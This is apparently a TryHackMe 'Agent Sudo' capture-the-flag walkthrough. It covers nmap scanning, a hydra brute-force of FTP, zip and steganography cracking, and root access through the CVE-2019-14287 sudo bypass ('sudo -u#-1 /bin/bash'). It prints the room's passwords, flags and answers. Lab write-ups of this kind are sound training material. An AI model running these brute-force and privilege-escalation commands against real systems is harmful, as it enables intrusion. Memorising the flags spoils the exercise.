TryHackMe Agent Sudo CTF Room Walkthrough

  • Target Machine IP: 10.224.129/10.10.165.115

Enumeration

nmap scan: nmap -sV -sC -Pn -oN scan.txt 10.10.224.129

  • Q. How many open ports?

    3
    

    From Nmap scan

  • Q. How you redirect yourself to a secret page?

    user-agent
    

    visit Website

  • Q. What is the agent name?

    chris
    

    Change user agent header from mozilla/chrome to C to access website contents

Hash Cracking and Bruteforce

  • Using hydra:

    hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://10.10.224.129
    

    FTP login details chris:crystal

  • Q. FTP password

    crystal
    
  • Now, access FTP service and download files from the FTP server with username chris and password crystal.

    ftp 10.10.224.129
    
    # Enter username and password when prompted
    ftp> dir
    200 PORT command successful. Consider using PASV.
    150 Here comes the directory listing.
    -rw-r--r--    1 0        0             217 Oct 29  2019 To_agentJ.txt
    -rw-r--r--    1 0        0           33143 Oct 29  2019 cute-alien.jpg
    -rw-r--r--    1 0        0           34842 Oct 29  2019 cutie.png
    226 Directory send OK.
    
    # now Download files
    > mget * .
    
    
  • After downloading files, cat To_agentJ.txt we know that password is hidden in one of the images:

    Dear agent J,
    
    All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.
    
    From,
    Agent C
    
  • We use binwalk to get information stored in the files

    $ binwalk -e cute-alien.jpg
    
    
    DECIMAL       HEXADECIMAL     DESCRIPTION
    --------------------------------------------------------------------------------
    0             0x0             JPEG image data, JFIF standard 1.01
    
    # cute-alien.jpg does not contain hidden password
    
    $ binwalk -e cutie.png
    
    DECIMAL       HEXADECIMAL     DESCRIPTION
    --------------------------------------------------------------------------------
    0             0x0             PNG image, 528 x 528, 8-bit colormap, non-interlaced
    869           0x365           Zlib compressed data, best compression
    34562         0x8702          Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
    34820         0x8804          End of Zip archive, footer length: 22
    
    # hence, cutie.png file contains hidden information in zip file which, these files will be separated into a folder _cutie.png.extracted
    
  • We can use zip2john tool to convert zip into a crackable hash format by john the ripper

    zip2john 8702.zip > ziphash.txt
    
  • Use john tool to crack file

    john ziphash.txt
    

    password: alien

  • Q. Zip file password

    alien
    
  • Use password and unzip the zip file and read To_agentR.txt file

    Agent C,
    
    We need to send the picture to 'QXJlYTUx' as soon as possible!
    
    By,
    Agent R
    

    QXJlYTUx is base64 encoded, we can use cyberchef project to decode string
    decoded string: Area51 which seems to be the steg password for cute-alien.jpg image

  • Q. steg password

    Area51
    
  • Extract Message from cute-alien.jpg using

    steghide extract -sf cute-alien.jpg
    # Enter Alien51 as password
    

    Data will be extracted and saved in message.txt file

  • Read message.txt file

    cat message.txt
    

    Output

    Hi james,
    
    Glad you find this message. Your login password is hackerrules!
    
    Don't ask me why the password look cheesy, ask agent R who set this password for you.
    
    Your buddy,
    chris
    
  • Q. Who is the other agent (in full name)?

    james
    
  • Q. SSH password

    hackerrules!
    

Capture The User Flag

  • Login to james account using SSH

  • The User Flag is located in the home directory james

    [email protected]:~$ cat user_flag.txt
    b03d975e8c92a7c04146cfa7a5a313c7
    
  • Q. What is the user flag?

    b03d975e8c92a7c04146cfa7a5a313c7
    
  • Copy Alien_autospy.jpg photo to attacker’s machine

    scp [email protected]:~/Alien_autospy.jpg .
    
  • Using Google Image Search and uploading image, we get various search results but using hint, we need results from Fox News, which leads us to Fox News Page, whose headlines gives us the answer

  • Q. What is the incident of the photo called?

    Roswell alien autopsy
    

Privilege Escalation

  • Finding SUIDs

    find / -perm -u=s -type f 2>/dev/null
    

    from output of above command we’re able to run sudo command

  • Listing commands available to user james to use with sudo

    [email protected]:~$ sudo -l
    [sudo] password for james:
    Matching Defaults entries for james on agent-sudo:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
    
    User james may run the following commands on agent-sudo:
        (ALL, !root) /bin/bash
    

    On searching (ALL, !root) /bin/bash on search engine it leads to an exploit-db search

  • Q. CVE number for the escalation

    CVE-2019-14287
    
  • From exploit program comments using below exploit, we get root user bash

    [email protected]:~$ sudo -u#-1 /bin/bash
    [email protected]:~#
    
  • Root Flags are usually located in /root/, navigating and reading the file we get

    [email protected]:/root# cat root.txt
    
    To Mr.hacker,
    
    Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine.
    
    Your flag is
    b53a02f55b57d4439e3341834d70c062
    
    By,
    DesKel a.k.a Agent R
    
  • Q. What is the root flag?

    b53a02f55b57d4439e3341834d70c062
    
  • Q. (Bonus) Who is Agent R?

    DesKel
    

Resources